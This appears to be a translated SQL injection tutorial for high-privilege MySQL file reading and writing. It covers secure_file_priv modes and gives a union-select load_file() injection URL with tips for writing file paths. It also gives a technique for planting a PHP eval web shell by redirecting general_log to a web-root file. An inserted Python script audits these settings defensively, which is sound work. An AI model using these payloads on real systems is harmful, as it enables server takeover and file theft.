SQL injection -- high privileges, load_file, reading and writing files

1. MySQL's newer feature that restricts file writing, and the alternative method

Newer versions of MySQL added the secure_file_priv option, which restricts where mysqld may import and export files.

secure_file_priv option

  1. mysqld is not allowed to import | export
      --secure_file_priv=null

  2. mysqld import | export may only happen under the /tmp/ directory
      --secure_file_priv=/tmp/

  3. No restriction on mysqld import | export
      --secure_file_priv=

Linux
cat /etc/my.cnf
    [mysqld]
    secure_file_priv=

Windows
    my.ini
    [mysqld]
    secure_file_priv=

View secure_file_priv

show global variables like '%secure%';

High-privilege injection encounters secure_file_priv

The configuration file of newer MySQL versions contains no secure_file_priv option by default. Querying secure_file_priv with the SQL statement above shows that when the option is not configured its value is NULL, which means files cannot be exported.

Alternative:
The path must be known

set global general_log=on;set global general_log_file='C:/phpStudy/WWW/123.php';select '<?php eval($_POST[123]) ?>';
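
A defender-side check for the settings discussed above, as an added example that is not part of the original page: it classifies secure_file_priv into the three modes and flags a general log pointed at a script-like file, both in server variables and in logged statements. The function names, the extension list and the sample data are assumptions constructed for illustration.

```python
import re

# Assumption for this example: extensions a web server would execute.
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx")
# Matches SET GLOBAL general_log_file='...' and the @@global. form.
SET_LOG_FILE = re.compile(
    r"set\s+(?:global\s+|@@global\.)general_log_file\s*=\s*(['\"])(.*?)\1", re.I)

def classify_secure_file_priv(value):
    """Map the variable's value to the three modes listed above."""
    if value is None or value.strip().upper() == "NULL":
        return "disabled"        # no import/export at all
    if value.strip() == "":
        return "unrestricted"    # import/export to any path
    return "restricted"          # import/export only under that directory

def audit_variables(variables):
    """variables: dict built from SHOW GLOBAL VARIABLES output."""
    findings = []
    if classify_secure_file_priv(variables.get("secure_file_priv")) == "unrestricted":
        findings.append("secure_file_priv is empty: import/export allowed to any path")
    log_file = variables.get("general_log_file", "")
    if log_file.lower().endswith(SCRIPT_EXT):
        state = variables.get("general_log", "OFF").upper()
        findings.append(f"general_log_file has a script extension: {log_file} (general_log={state})")
    return findings

def flag_statements(statements):
    """Return statements that repoint the general log at a script-like file."""
    hits = []
    for stmt in statements:
        m = SET_LOG_FILE.search(stmt)
        if m and m.group(2).lower().endswith(SCRIPT_EXT):
            hits.append(stmt)
    return hits

# Constructed sample data, not captured from a real server.
SAMPLE_VARS = {"secure_file_priv": "NULL", "general_log": "ON",
               "general_log_file": "C:/phpStudy/WWW/123.php"}
SAMPLE_STATEMENTS = [
    "SELECT * FROM users WHERE id=1",
    "set global general_log_file='C:/phpStudy/WWW/123.php'",
    "SET GLOBAL general_log_file = '/var/lib/mysql/host.log'",
]

if __name__ == "__main__":
    for finding in audit_variables(SAMPLE_VARS):
        print("finding:", finding)
    for stmt in flag_statements(SAMPLE_STATEMENTS):
        print("statement:", stmt)
```

The variables dict can be filled from the `show global variables` query shown earlier; the statement list would come from whatever query or audit log the server already keeps.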


2. High-privilege file read and write

load_file() read file

http://test.com/sqli/Less-1/?id=-1' union select 1,load_file('c:\\flag.txt'),3 --+

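1. Use \\ in the path, otherwise it is treated as an escape character
2. Use / in the path
3. Files in the drive's root path can be given as c:admin.txt
4. Hexadecimal file name
5. char(ASCII codes of the path)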

into outfile / into dumpfile write file
